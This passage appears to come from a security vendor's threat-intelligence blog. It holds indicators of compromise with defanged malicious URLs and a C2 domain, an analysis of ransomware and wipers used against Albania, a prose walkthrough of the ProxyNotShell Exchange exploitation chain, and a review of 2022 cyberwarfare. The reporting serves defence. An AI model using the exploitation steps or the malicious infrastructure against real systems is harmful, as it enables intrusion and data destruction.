hxxps://docs.azure-protection[.]cloud/%2BgFJKOpVX/4vRuFIaGlI/D%2BOfpTtg/YTN0TU1BNx/bMA5aGuZZP/ODq7aFQ%3D/%3D
hxxps://docs.azure-protection[.]cloud/+gFJKOpVX/4vRuFIaGlI/D+OfpTtg/YTN0TU1BNx/bMA5aGuZZP/ODq7aFQ%3D/%3D
hxxps://bankofamerica.us[.]org/lsizTZCslJm/W+Ltv_Pa/qUi+KSaD/_rzNkkGuW6/cQHgsE=
hxxps://www.capmarketreport[.]com/packageupd.msi?ccop=RoPbnVqYd

Pivoted IP address
152.89.247.87
172.86.121.130
104.168.174.80

MITRE ATT&CK Mapping Tactic Technique Technique name Initial Access T1566.001

T1566.002 Phishing: Spearphishing Attachment

Phishing: Spearphishing Link Execution T1059.003

T1059.005

T1204.001

T1204.002 Command and Scripting Interpreter: Windows Command Shell

Command and Scripting Interpreter: Visual Basic

User Execution: Malicious Link

User Execution: Malicious File Persistence T1547.008 Boot or Logon Autostart Execution: LSASS Driver Defense Evasion T1027.002

T1497.001

T1055.002

T1553.005

T1218.007

T1218.011

T1221 Obfuscated Files or Information: Software Packing

Virtualization/Sandbox Evasion: System Checks

Process Injection: Portable Executable Injection

Subvert Trust Controls: Mark-of-the-Web Bypass

System Binary Proxy Execution: Msiexec

System Binary Proxy Execution: Rundll32

Template Injection Command and Control T1071.001 Application Layer Protocol: Web Protocols Exfiltration T1041 Exfiltration over C2 Channel

[1] APT Intel report: BlueNoroff Launched a New Campaign To Attack Cryptocurrency Business

2022. december 22.

Ransomware and wiper signed with stolen certificates

Introduction

On July 17, 2022, Albanian news outlets reported a massive cyberattack that affected Albanian government e-services. A few weeks later, it was revealed that the cyberattacks were part of a coordinated effort likely intended to cripple the country’s computer systems. On September 10, 2022, Albanian local news reported a second wave of cyberattacks targeting Albania’s TIMS, ADAM and MEMEX systems – the latter two systems critical for law enforcement – reportedly using the same attack type and by the same actors.

Around the same time, we identified ransomware and wiper malware samples resembling those used in the first wave, though with a few interesting modifications that likely allowed evasion of security controls and better attack speeds. Chief among those changes are the embedding of a raw disk driver, providing direct hard disk access inside the malware itself, modified metadata, and the use of Nvidia’s leaked code signing certificate to sign the malware.

So, what’s new in this blogpost?

  • We compare the first and second waves of ransomware and wiper malware used to target Albanian entities and detail connections with previously known ROADSWEEP ransomware and ZEROCLEARE variants.
  • The threat actors used certificates from Nvidia and Kuwait Telecommunications Company to sign their malware; the former was already leaked, but we’re not sure how they got their hands on the latter.
  • We identified potential cooperation between different attack groups speaking different languages, and the possible use of AnyDesk as an initial entry point to start the ransomware/wiper infections.
  • The changes implemented to automate and speed up wiping in the second wave of attacks are reminiscent of the notorious Shamoon wiper attacks in the Middle East.
Wiper and ransomware, comparing wave 1 and wave 2

Below, we compare and discuss the differences between the wave 1 and wave 2 ransomware and wiper malware.

Initial Infection – traces of cooperation between different attack groups and use of AnyDesk utility

Although we weren’t able to identify the initial entry point of the threat actor in the analyzed intrusion, a few days after the second wave wiping activities, we noticed underground chatter about someone having access to an AnyDesk account at another non-governmental but significant Albanian entity, and suggestions for Persian-speaking hackers to use it for deploying ransomware or wiper malware. This may increase the likelihood that the initial entry point for wave 2 is through legitimate remote access software such as AnyDesk, especially since we know that the wave 2 wiper modifications included automatic execution upon driver installation only – potential need for urgency due to the limited time/access window. The attackers and access provider seemed to belong to different attack groups and spoke different languages.

The ransomware – use of Kuwait Telecommunications Company signing certificate MD5 96eabcc77a6734ea8587599685fbf1b4 SHA1 6a36962709abbfc1f88f87e7fe88a417302bfe43 SHA256 8ad01b028e6aa711d26879d346a7bef82516e372e0f14e8e69db6aef0f25d992 Imphash 653ee44c85bc91d12ec33dfed8056c27 Link time Wed Jul 06 21:30:41 2016 File type 32-bit executable Compiler MinGW-w32 gcc File size 45.48 KB File name PdftoDoc.exe

This second wave sample has the same signing certificate parameters as the first wave sample, which is related to Kuwait Telecommunications Company. It’s unclear how the threat actor was able to sign its malware using Kuwait Telecommunications Company’s certificate, but we suspect it was stolen. As of the date of this publication, the certificate is no longer valid and has been revoked.

After the initial execution, the wave 2 ransomware checks for any six arguments (or more) supplied by the threat actor, as opposed to the wave 1 sample that checks for five arguments or more – a small modification that assists in defense evasion. Nevertheless, the intrusion analysis conducted on one of the affected machines indicates that in wave 2 the threat actor did not use a BAT file to invoke the ransomware while supplying seven digits similar to wave 1, but instead invoked the wave 2 ransomware immediately from the command line using six zeroes: “000000”. If ransomware execution fails because the correct arguments are not supplied, the wave 2 sample displays a different message from that of wave 1; the wave 2 message resembles an error message displayed by a PDF to DOC converter.

Wave 1 sample – messaging after failed execution

Wave 2 sample – different messaging after failed execution

The wave 2 ransomware sample continues execution and checks for the mutex Screenlimitsdevices#77!;, a value that differs from the wave 1 sample’s mutex:
abcdefghijklmnoklmnopqrstuvwxyz01234567890abcdefghijklmnopqrstuvwxyz01234567890

Although we call this malware ransomware based on its behavior, the encrypted files are, in fact, unrecoverable. When comparing wave 2 ransomware samples to wave 1, we notice that both have the same , and both use CreateFile and WriteFile APIs to overwrite files. During the process of execution, wave 2 ransomware attempts to decrypt and execute embedded scripts, malware settings or API function names. The encryption algorithm used is RC4 in both wave 1 and wave 2. However, the RC4 key for decryption in wave 2 has been changed in another attempt to evade detection.

  • Wave 1 RC4 key: 8C E4 B1 6B 22 B5 88 94 AA 86 C4 21 E8 75 9D F3
  • Wave 2 RC4 key: F0 B4 ED D9 43 F5 C8 43 C9 D0 A2 4F 22 9B BC 3A

It’s worth noting that in both waves, the RC4 decryption method uses CryptoAPI (CryptDecrypt) instead of the usual substitution box method. The intrusion we analyzed in wave 2 indicates that the ransomware was probably deployed over the internal network, possibly from another compromised machine. This is reinforced by the fact that we didn’t see anything else dropped or executed before the ransomware execution, and the ransomware executable name was randomly generated, potentially by the tool the threat actor used to deploy it over the network (e.g., Mellona.exe).

Despite all the changes made in the wave 2 ransomware, the ransom notes remained the same and included political messaging that reflects the geopolitical tensions between Albania and Iran.

Ransom note in both wave 1 and wave 2 ransomware

The wiper – use of Nvidia signing certificate MD5 64cb923be15ae255b82e7ebcf24ccfc5 SHA1 e1b8b72fbd1e3b9bbf8bebd2e14a3f2e071c6048 SHA256 d8ec8ec8dfa582c44e81b8a7fcc44defc3d2fa658f75fa495124aedc3b0db367 Imphash 81CA8B811412284938148FC4F2A76C09 Link time 0x6319C758 (Thu Sep 08 03:43:36 2022) File type PE 64-bit Compiler Microsoft Visual C/C++ File size 174.00 KB File name DiskSnapshot.exe Driver PDB path c:\projects\rawdisk\bin\wnet\fre\amd64\rawdsk3.pdb Driver key B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D

Similar to the wave 2 ransomware sample, the threat actor made several modifications to the wave 2 wiper malware, probably to evade detection. The three main changes are:

  • Modified malware signing
  • Embedding of EldoS RawDisk driver inside the wiper malware
  • Automatic wiping after driver installation command

Historically, in ZEROCLEARE and DUSTMAN incidents from 2019, the wiper malware and raw disk drivers were not signed and therefore could not directly access the raw disk for speedy data wiping. So, the wipers had to use a third-party loader such as TDL – a signed loader for unsigned drivers – to install the unsigned raw disk driver that allows the wiper malware to directly access the raw disk for wiping data using DeviceControl API methods. However, in the first attack wave targeting Albania, the threat actor signed the wave 1 wiper using the Kuwait Telecommunications Company certificate, thus removing the need for a third-party loader. The speed and automation improvements remind us of previous Shamoon operations in the Middle East.

Since the wave 1 wipers were exposed in July 2022, and likely to avoid static detections, the threat actor used Nvidia’s leaked signing certificate to sign the wave 2 wiper in September 2022, again eliminating the need for a third-party loader for the raw disk driver.

In wave 1, the wiper malware expected to find the raw disk driver in the execution directory or in the system directory. The driver wasn’t dropped by the wiper, and the threat actor likely dropped it using other means. Conversely, in wave 2 the threat actor embedded the signed raw disk driver in the wiper executable, dropped it and then installed it. In addition, the driver being used by the threat actor in wave 2 seems to copy metadata and a few functions from Microsoft’s diskdump.sys crash dump driver[1] (version 10.0.19041.1682) as another means to avoid detections. The wiping activity starts automatically after the driver installation command; as opposed to the wave 1 wiper, where installation is one step and wiping execution is a second step.

Finally, for the most part, wave 1 and wave 2 wipers remained the same, including the reliance on the same authentication key to access the raw disk driver, and the use of the same DeviceControl API methods, but with one exception, as shown below. It’s worth noting that the method IOCTL_DISK_GET_LENGTH_INFO is exclusive to all Persian-speaking APT wipers.

  • Wave 1 wiper DeviceControl API methods:
    • IOCTL_DISK_GET_DRIVE_GEOMETRY_EX
    • IOCTL_DISK_GET_DRIVE_GEOMETRY
    • IOCTL_DISK_GET_LENGTH_INFO
  • Wave 2 wiper DeviceControl API methods:
    • IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS (new method in wave 2; used in multiple instances)
    • IOCTL_DISK_GET_DRIVE_GEOMETRY
    • IOCTL_DISK_GET_LENGTH_INFO

Based on our telemetry, we suspect the infections are associated with law enforcement institutions in Albania. This targeting is consistent with the previous wave of cyberattacks affecting the Albanian government during the July 2022 wave of cyberattacks.

Conclusions

In this publication, we discussed the changes made to the second wave of ransomware and wiper samples that targeted Albanian institutions to evade detection and inflict maximum damage.

Aside from the changes made to evade detection in wave 2, we suspect that the threat actors needed an automated and speedy wiper execution. In wave 2, the raw disk driver was embedded inside the malware and the wiping routine started immediately after driver installation, as opposed to the wave 1 procedure. This is reminiscent of Shamoon operations in the Middle East.

Finally, for defenders we can highlight two important elements from the intrusion and malware analysis presented here:

  • Monitor for remote software activities such as AnyDesk for unauthorized use
  • Always hunt and monitor for expired and/or leaked signing certificates as they can be used by threat actors to load and execute malware
Threat detection

The detection logic has been improved in all our solutions to ensure that our customers remain protected. We continue to investigate this threat using our Threat Intelligence and we will add additional detection logic once they are available.

Our products protect against this threat and detect it with the following names:

  • HEUR:Trojan-Ransom.Win32.Agent.gen
  • Trojan-Ransom.Win32.Gen.aghh
  • Trojan-Ransom.Win64.Agent.dpf
  • Win32.Agentb.kzkj
Indicators of compromise File hashes (malicious documents, Trojans, emails, decoys)

Ransomware

96eabcc77a6734ea8587599685fbf1b4  PdftoDoc.exe (wave 2) bbe983dba3bf319621b447618548b740 GoXml.exe (wave 1)

Wiper

64cb923be15ae255b82e7ebcf24ccfc5 DiskSnapshot.exe (wave 2) 7b71764236f244ae971742ee1bc6b098 cl.exe (wave 1)

Driver

C7BE7E90F63DADA6CD541FA84880874B $windir\$system32\drivers\disksdump.sys (originally known as diskdump.sys) Signing certificates serial numbers 14 78 1B C8 62 E8 DC 50 3A 55 93 46 F5 DC C5 18 Nvidia certificate 01 FD D0 93 F6 50 87 F4 E9 AE 11 ED 65 0D 83 E8 Kuwait Telecommunications company certificate

[1] Original, legitimate driver’s MD5 is 015caeec9148194054b5b1de64762a43

2022. december 19.

CVE-2022-41040 and CVE-2022-41082 – zero-days in MS Exchange

Summary

At the end of September, GTSC reported an attack on critical infrastructure that took place in August. During the investigation, experts found that two 0-day vulnerabilities in Microsoft Exchange Server were used in the attack. The first one, later identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability that allows an authenticated attacker to remotely trigger the next vulnerability – CVE-2022-41082. The second vulnerability, in turn, allows remote code execution (RCE) when MS Exchange PowerShell is accessible to the attacker. As noted in the GTSC report, both vulnerabilities were exploited together in the wild to create a backdoor on a vulnerable server, and perform lateral movement.

After CVE-2022-41040 and CVE-2022-41082 were revealed, Microsoft provided mitigation guidance followed by a few updates. According to the company, the vulnerabilities affect MS Exchange Server 2013, MS Exchange Server 2016 and MS Exchange Server 2019.

On October 11, 2022, Microsoft released patches to cover these vulnerabilities as part of its Patch Tuesday update. After that, on November 17, a security researcher published the first working PoC. It was a Python script that accepts the following parameters: user, password, mail address and command line to be executed on the victim’s host.

The cybersecurity community dubbed the pair of vulnerabilities ProxyNotShell. The name refers to a recent ProxyShell attack chain containing similar vulnerabilities in Exchange Servers that were disclosed in 2021. ProxyShell is a set of three vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207. Attackers used them to create web shells and execute arbitrary code on vulnerable Microsoft Exchange Servers.

ProxyNotShell exploitation details

The first step in this attack is exploiting CVE-2022-41040 to get access to the PowerShell API endpoint. Using an insufficient filtering of input data in the Exchange Autodiscover mechanism, an attacker with a known login and password combination for a registered account, can gain access to the privileged endpoint of the Exchange Server API (https://%exchange server domain%/powershell). This access allows the attacker to execute PowerShell commands in Exchange’s environment on the server machine, passing them in the payload via the XML SOAP protocol.

At the next step, the attacker must get access to Web-Based Enterprise Management (WBEM) via the WSMAN Protocol. The attacker initiates the shell on the vulnerable system for further PowerShell script execution via Windows Remote Management (PsRemoting).

HTTP POST request with XML SOAP to initiate PsRemoting

After initiation of the shell, the attacker should immediately extend its lifetime; otherwise, the shell will be closed as its expiration time is too short by default. This is necessary for further command execution on Exchange Server. To do that the attacker immediately sends a special request via WSMAN that enables the keep alive option.

HTTP POST request with XML SOAP to extend the shell’s lifetime

After that, the attacker exploits a second vulnerability – CVE-2022-41082. By using PowerShell Remoting the attacker sends a request to create an address book, passing encoded and serialized data with a special payload as a parameter. In a published PoC, this encoded data contains a gadget called System.UnitySerializationHolder that spawns an object of the System.Windows.Markup.XamlReader class. This class processes XAML data from a payload, which creates a new object of the System.Diagnostics class and contains a method call to open a new process on the target system. In the published PoC, this process is calc.exe.

HTTP POST request with XML SOAP to start new process

Main payload portion that executes the calc.exe process

ProxyNotShell post exploitation

A few weeks later after the vulnerability was disclosed, Kaspersky detected a successful exploitation of ProxyNotShell in the wild. The actor performed the following actions:

  • Reconnaissance (users, groups, domains)
  • Various hijack attempts (even dropping vulnerable binaries)
  • Remote process injection
  • Persistence
  • Reverse shell

In this case, the attacker had the credentials to perform such an intrusion. They exploited the company’s Exchange Server and as a result were able to create any process they wanted on the Exchange machine, passing commands as a payload.

On the server side all processes that are started via exploitation have a main parent process with certain parameters: w3wp.exe -ap “msexchangepowershellapppool”.

These post-exploitation steps of the attack are very similar to the steps in the attack reported by TrendMicro, with the only difference being the vulnerabilities that are exploited.

Our products protect against all of these post exploitation steps as well as other attacks leveraging the CVE-2022-41040 and CVE-2022-41082 vulnerabilities. The detection name for ProxyNotShell is PDM:Exploit.Win32.Generic.

Our recommendations

A few words of advice to those worried about possible exploitation of ProxyNotShell or other 0-day vulnerabilities:

  • Focus your defense strategy on detecting lateral movement and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections.
  • Use the latest Threat Intelligence data to stay aware of actual TTPs used by threat actors.
  • Use a security solution with exploit prevention, vulnerability and patch management components, such as Kaspersky Endpoint Security for Business. Our Exploit Prevention component monitors suspicious actions by applications and blocks the execution of malicious files.
  • Use solutions like Kaspersky Endpoint Detection and Response and Kaspersky Managed Detection and Response that identify and stop attacks in the early stages.
Indicators of compromise F77E55FD56FDAD21766CAA9C896734E9 LockDown.dll Malware hijack library Trojan.Win64.Dllhijacker F9322EAD69300501356B13D751165DAA mfeann.exe Dropped vulnerable binary for DLL hijack PDM:Exploit.Win32.Generic A2FAE32F116870E5A94B5FAB50A1CB71 Svchosts.exe Malware reverse proxy Trojan.Win64.Agent.qwibok
HEUR:HackTool.Win64.Proxy.gen 47A0814408210E6FCA502B3799B3952B Glib-2.0.dll Malware hijack library Trojan.Win64.Dllhijacker 379F87DAA6A23400ADF19C1CDD6B0DC9 vmwarexferlogs.exe Dropped vulnerable binary for DLL hijack PDM:Exploit.Win32.Generic 193.149.185.52:443 С2 server sync.service.auzreservices.com С2 server
2022. december 14.

Reassessing cyberwarfare. Lessons learned in 2022

At this point, it has become cliché to say that nothing in 2022 turned out the way we expected. We left the COVID-19 crisis behind hoping for a long-awaited return to normality and were immediately plunged into the chaos and uncertainty of a twentieth-century-style military conflict that posed serious risks of spreading over the continent. While the broader geopolitical analysis of the war in Ukraine and its consequences are best left to experts, a number of cyberevents have taken place during the conflict, and our assessment is that they are very significant.

In this report, we propose to go over the various activities that were observed in cyberspace in relation to the conflict in Ukraine, understand their meaning in the context of the current conflict, and study their impact on the cybersecurity field as a whole.

Timeline of significant cyber-events predating Feb 24th

In the modern world, it has become very difficult to launch any kind of military campaign without intelligence support in the field. Most intelligence is gathered from various sources through methods such as HUMINT (human intelligence, gathered from persons located in the future conflict area), SIGINT (signals intelligence, gathered through the interception of signals), GEOINT (geospatial intelligence, such as maps from satellites), or ELINT (electronic intelligence, excluding text or voice), and so on.

For instance, according to the New York Times, in 2003, the United States made plans for a huge cyberattack to freeze billions of dollars in Saddam Hussein’s bank accounts and cripple his government before the invasion of Iraq. However, the plan was not approved because the government feared collateral damage. Instead, a more limited plan to cripple Iraq’s military and government communication systems was carried out during the early hours of the war in 2003. This operation included blowing up cellphone towers and communication grids as well as jamming and cyberattacks against Iraq’s telephone networks. According to the same article, another such attack took place in the late 1990s when the American military attacked a Serbian telecommunications network. Inadvertently, this also affected the Intelsat communications system for days, proving that the risk of collateral damage during cyberwarfare is pretty high.

The lessons learned from these events may allow predicting kinetic conflicts by monitoring new cyberattacks in potential areas of conflict. For instance, in late 2013 and January 2014, we observed higher-than-normal activity in Ukraine by the Turla APT group, as well as a spike in the number of BlackEnergy APT sightings. Similarly, at the beginning of February 2022, we noticed a huge spike in the amount of activity related to Gamaredon C&C servers. This activity reached hitherto-unseen levels, suggesting massive preparations for a major SIGINT gathering effort.

As shown by these cases, during modern conflicts, we can expect to see significant signs and spikes in cyberwarfare relating to both collection of intelligence and destructive attacks in the days and weeks preceding military attacks. Of course, we should note that the opposite is also possible: for instance, starting in June 2016, but most notably since September 2016 all the way to December 2016, the Turla group intensified their satellite-based C&C registrations tenfold compared to its 2015 average. This indicated unusually high activity by the Turla group, which signaled a never-before-seen mobilization of the group’s resources. At the same time, there was no ensuing military conflict that we know of.

Key insights
  • Today’s military campaigns follow gathering of supporting intelligence in the field; this includes SIGINT and ELINT among others
  • Significant military campaigns, such as the 2003 invasion of Iraq, have been complemented by powerful cyberattacks designed to disable the enemy’s communication networks
  • In February 2022, we noticed a huge spike in activity related to Gamaredon C&C servers; a similar spike was observed in Turla and BlackEnergy APT activity in late 2013 and early 2014
  • We can expect to see significant signs and spikes in cyberwarfare in the days and weeks preceding military conflicts
Day one

On the very first day of the conflict (February 24, 2022), a massive wave of indiscriminate pseudo-ransomware and wiper attacks hit Ukrainian entities. We were not able to determine any form of consistency when it came to the targeting, which led us to believe that the main objective of these attacks may have been to cause chaos and confusion — as opposed to achieving precise tactical goals. Conversely, the tools leveraged in this phase were just as varied in nature:

  • Ransomware (IsaacRansom);
  • Fake ransomware (WhisperGate);
  • Wipers (HermeticWiper, CaddyWiper, DoubleZero, IsaacWiper);
  • ICS/OT wipers (AcidRain, Industroyer2).

Some of them were particularly sophisticated. As far as we know, HermeticWiper remains the most advanced wiper software discovered in the wild. Industroyer2 was discovered in the network of a Ukrainian energy provider, and it is very unlikely that the attacker would have been able to develop it without access to the same ICS equipment as used by the victim. That said, a number of those tools are very crude from a software engineering perspective and appear to have been developed hurriedly.

With the notable exception of AcidRain (see below), we believe that these various destructive attacks were both random and uncoordinated – and, we argue, of limited impact in the grand scheme of the war. Our assessment of the threat landscape in Ukraine in the first months of the war can be found on SecureList.

The volume of wiper and ransomware attacks quickly subsided after the initial wave, but a limited number of notable incidents were still reported. The Prestige ransomware affected companies in the transportation and logistics industries in Ukraine and Poland last October. One month later, a new strain named RansomBoggs again hit Ukrainian targets – both malware families were attributed to Sandworm. Other “ideologically motivated” groups involved in the original wave of attacks appear to be inactive now.

Key insights
  • Low-level destructive capabilities can be bootstrapped in a matter of days.
  • Based on the uncoordinated nature of these destructive attacks, we assess that some threat actors appear to be capable of recruiting isolated groups of hackers on short notice, to perform destabilizing tasks. We can only speculate as to whether those groups are internal resources reassigned to low-level cyberattacks or external entities that can be mobilized when the need arises.
  • While the impact of these destructive cyber-attacks paled in comparison to the effects of the kinetic attacks taking place at the same time, it should be noted that this capability could in theory be directed against any country outside of the context of an armed conflict and under the pretense of traditional cybercrime activity.
The Viasat “cyberevent”

On the 24th of February, Europeans who relied on the ViaSat-owned “KA-SAT” satellite faced major Internet access disruptions. This so-called “cyber-eventstarted around 4h UTC, less than two hours after the Russian Federation publicly announced the beginning of the “special military operation” in Ukraine. As could be read from government requests for proposals, the Ukrainian government and military are notable consumers of KA-SAT access, and were reportedly affected by the event. But the disruptions also triggered major consequences elsewhere, such as interrupting the operation of wind turbines in Germany.

ViaSat quickly suspected that disruptions could be the result of a cyberattack. It directly affected satellite modems firmwares, but was still to be understood as of mid-March. Kaspersky experts ran their own investigations and notably uncovered a likely intrusion path to a remote access point in a management network, while analyzing modem internals and a likely-involved wiper implant. The “AcidRain” wiper was first described later in March, while ViaSat published an official analysis of the cyber-attack. The latter confirmed that a threat actor got in through a remote-management network exploiting a poorly configured VPN, and ultimately delivered destructive payloads, affecting tens of thousands of KA-SAT modems. On May 10, the European Union attributed those malicious activities to the Russian Federation.

A lot of technical details about this attack are still unknown and may later be shared away from government eyes. Yet it is one of the most sophisticated attacks revealed to date in connection to the conflict in Ukraine. The malicious activities were likely conducted by a skilled and well-prepared threat actor, within an accurate timeframe which cannot be fortuitous. While the sabotage has likely failed to disrupt the Ukrainian defense badly enough, it had multiple effects beyond the battlefield: stimulating the US Senate to require a state of play on satellite cybersecurity, accelerating SpaceX Starlink deployment (and later, unexpected bills), as well as questioning the rules for dual-use infrastructure during armed conflicts.

Key insights
  • The ViaSat sabotage once again demonstrates that cyberattacks are a basic building block for modern armed conflicts and may directly support key milestones in military operations.
  • As it has been suspected for years, advanced threat actors likely preposition themselves in various strategic infrastructural assets in preparation for future disruptive actions.
  • Cyberattacks against common communication infrastructures are highly likely during armed conflict, as belligerents might consider these to be of dual use. Due to the interlinked nature of the Internet, a cyberattack against this kind of infrastructure will likely have side-effects for parties that are not involved in the armed conflict. Protection and continuity planning are of utmost importance for this communications infrastructure.
  • The cyberattack raises concerns about the cybersecurity of commercial satellite systems, which may support various applications, from selfie geolocation to military communications. While protective measures against kinetic combat in space are frequently discussed by military forces, and more datacenters are expecting to fly soon … ground-station management systems and operators still seem to be highly exposed to common cyberthreats.
Taking sides: professional ransomware groups, hacktivists, and DDoS attacks

As has always been the case, wartime has a very specific impact on the information landscape. It is especially true in 2022, now that humanity commands the most potent information spreading tools ever created: social networks and their well-documented amplification effect. Most real-world events related to the war (accounts of skirmishes, death tolls, prisoner of war testimonies) are shared and refuted online with varying degrees of good faith. Traditional news outlets are also affected by the broader context of information warfare.

DDoS attacks and, to a lesser extent, defacement of random websites have always been regarded as low-sophistication and low-impact attacks by the security community. DDoS attacks, in particular, require generating heavy network traffic that attackers typically cannot sustain for very long periods of time. As soon as the attack stops, the target website becomes available again. Barring temporary loss of revenue for e-commerce websites, the only value provided by DDoS attacks or defacement is the humiliation of the victim. Since non-specialized journalists may not know the difference between the various types of security incidents, their subsequent reporting shapes a perception of incompetence and inadequate security that may erode users’ confidence. The asymmetric nature of cyberattacks plays a key role in supporting a David vs. Goliath imagery, whereby symbolic wins in the cyberfield help convince ground troops that similar achievements are attainable on the real-life battlefield.

According to Kaspersky DDoS Protection, since the beginning of 2022 during 11 months the service registered ~1,65 more attacks than in the whole 2021. While this growth may be not too significant, the resources have been under attack 64 longer compared to 21. In 2021 the average attack lasted ~28 minutes, in 2022 – 18,5 hours, which is almost 40 times longer. The longest attack lasted 2 days in 2021, 28 days (or 2486505 seconds) in 2022.

Total duration of DDoS attacks detected by Kaspersky DDoS Protection in seconds, by week, 2021 vs 2022

Since the start of the war, a number of (self-identified) hacktivist groups have emerged and started conducting activities to support either side. For instance, a stunt organized by the infamous collective Anonymous involved causing a traffic jam in Moscow by sending dozens of taxis to the same location.

Kaspersky DDoS protection also reflects this trend. Massive DDoS attacks were spread unevenly over the year with the most heated times being in spring and early summer.

Number of DDoS attacks detected by Kaspersky DDoS Protection in seconds, by week, 2021 vs 2022

The attackers peaked in February-early March, reflecting growth of hacktivism, which has died down by autumn. Currently we see a regular anticipated dynamic of attacks, though their quality has changed. In May-June we detected extremely long attacks. Now their length has stabilized, nevertheless, while typical attacks used to last a few minutes, now they last for hours.

On February 25, 2022, the infamous Conti ransomware group announced their “full support of Russian government”. The statement included a bold phrase: “If anybody will decide to organize a cyberattack or any war activities against Russia, we are going to use our all possible resources to strike back at the critical infrastructures of an enemy“. The group followed up rather quickly with another post, clarifying their position in the conflict: “As a response to Western warmongering and American threats to use cyber warfare against the citizens of Russian Federation, the Conti Team is officially announcing that we will use our full capacity to deliver retaliatory measures in case the Western warmongers attempt to target critical infrastructure in Russia or any Russian-speaking region of the world. We do not ally with any government and we condemn the ongoing war. However, since the West is known to wage its wars primarily by targeting civilians, we will use our resources in order to strike back if the well being and safety of peaceful citizens will be at stake due to American cyber aggression“.

Two days later, a Ukrainian security researcher leaked a large batch of internal private messages between Conti group members, covering over one year of activity starting in January 2021. This dump delivered a significant blow to the group who saw their inner activities exposed before the public, including Bitcoin wallet addresses related to many million of US dollars received in ransom. At the same time, another cybercriminal group called “CoomingProject” and specializing in data leaks, announced they would support the Russian Government if they saw attacks against Russia:

Other groups, such as Lockbit, preferred to stay neutral, claiming their “pentesters” were an international community, including Russians and Ukrainians, and it was “all business”, in a very apolitical manner:

On February 26, Mykhailo Fedorov, the Vice Prime Minister and Minister of Digital Transformation of Ukraine, announced the creation of a Telegram channel to “continue the fight on the cyber front”. The initial Telegram channel had a typo in the name (itarmyofurraine) so a second one was created.

IT ARMY of Ukraine Telegram channel

The channel operators constantly give tasks to the subscribers, such as DDoS’ing various business corporations, banks, or government websites:

List of DDoS targets posted by IT ARMY of Ukraine

Within a short time, the IT Army of Ukraine, composed of volunteers coordinating via Twitter and Telegram, reportedly defaced or otherwise DDoSed over 800 websites, including high-profile entities such, as the Moscow Stock Exchange[1].

Parallel activity has also been observed by other groups, which have taken sides as the conflict was spilling over into neighboring countries. For instance, the Belarusian Cyber-Partisans claimed they had disrupted the operations of the Belrusian Railway by switching it to manual control. There goal was to slow the movement of Russian military forces through the country.

Belarusian Cyber-Partisans post

A limited and by far not exhaustive list of some of the ransomware or hacktivist groups that expressed their opinion about the conflict in Ukraine include:

Open UA support Open RU support Neutral RaidForums Conti ransomware Lockbit ransomware Anonymous collective CoomingProject ransomware ALPHV ransomware IT ARMY of Ukraine Stormous ransomware Belarusian Cyber-Partisans KILLNET AgainstTheWest NB65 Squad303 Kelvinsecurity + …

Among the openly pro-Russian groups, Killnet, which was originally established as a response to the “IT Army of Ukraine”, is probably the most active. In late April, they attacked Romanian Government websites in response to statements by Marcel Ciolacu, president of the Romanian Chamber of Deputies, after he promised Ukrainian authorities “maximum assistance”. On May 15, Killnet published a video on their telegram channel declaring war on ten nations: the United States, the United Kingdom, Germany, Italy, Latvia, Romania, Lithuania, Estonia, Poland, and Ukraine. Following these activities, the international hacking collective known as “Anonymous” declared cyber war against Killnet on May 23.

Killnet continued its activities throughout 2022, preceding their attacks with an announcement on their Telegram channel. In October, the group started attacking organizations in Japan, which they later stopped due to a lack of funds. It later attacked a US airport and governmental websites and businesses, often without significant success. On November 23, Killnet briefly took down the website of the European Union. Killnet also repeatedly targeted websites in Latvia, Lithuania, Norway, Italy, and Estonia. While Killnet’s methods are not sophisticated, they continually make headlines and drive attention to the group’s activities and stance.

Key insights
  • The conflict in Ukraine has created a breeding ground for new cyberware activity by various parties including cybercriminals and hacktivists, who rushed to support their favorite sides
  • We can expect the involvement of hacktivist groups in all major geopolitical conflicts from now on.
  • The cyberware activities are spilling over into neighboring countries and affecting a large number of entities, including governmental institutions and private companies
  • Some groups, such as the IT Army of Ukraine, have been officially backed by governments, and their Telegram channels include hundreds of thousands of subscribers
  • The majority of attacks have relatively low complexity
  • Most of the time, attacks conducted by these groups have a very limited impact on operations but may erroneously be reported as serious incidents and cause reputational damage.
  • These activities may originate from genuine “grassroots” hacktivists, groups encouraged or supported by one of the belligerents, or from the belligerents themselves – and telling which is which may well prove impossible.
Hack and leak

On the more sophisticated end of attacks attempting to hijack media attention, hack-and-leak operations have been on the rise since the beginning of the conflict. The concept is simple: breaching into an organization and publishing its internal data online, often via a dedicated website. This is significantly more difficult than a simple defacing operation, since not all machines contain internal data worth releasing. Hack-and-leak operations, therefore, require more precise targeting, and will, in most cases, also demand more skill from attackers, as the information they are looking for is, more often than not, buried deep within in the victim’s network.

An example of such a campaign is the “doxing” of Ukrainian soldiers. Western entities were also targeted, such as the Polish government or many prominent pro-Brexit figures in the UK. In the latter cases, internal emails were published, leading to scrutiny by investigative journalists. In theory, these data leaks are subject to manipulation. The attackers have all the time they need to edit any released document or could just as well inject entirely forged ones.

It is important to note that it is absolutely unnecessary for the attacker to go to such lengths for the data leak to be damaging. The public availability of the data is proof itself that a serious security incident took place, and the legitimate, original content may already contain incriminating information.

Key insights
  • In our 2023 APT predictions, we foresee that hack-and-leak operations will be on the rise next year, as they are very efficient against entities that already have high media exposure and corruption levels (i.e. politicians).
  • Information warfare is not internal to a conflict, but instead directed at all onlookers. We expect that the vast majority of such attacks will not be directed at the belligerents, but rather at entities who are perceived as being too supportive (or not supportive enough) of either side.
  • Whether it is hack-and-leak operations or DDoS, cyberattacks emerge as a non-kinetic means of diplomatic signaling between states.
Poisoned open-source repositories, weaponizing open-source software

Open-source software has many benefits. Firstly, it is often free to use, which means that businesses and individuals can save money on software costs. However, since anyone can contribute to the code and make improvements, this can also be abused and in turn, open security trapdoors. On the other hand, since the code can be publicly examined for any potential security vulnerabilities, it also means that given enough scrutiny, the risks of using open-source software can be mitigated to decent levels.

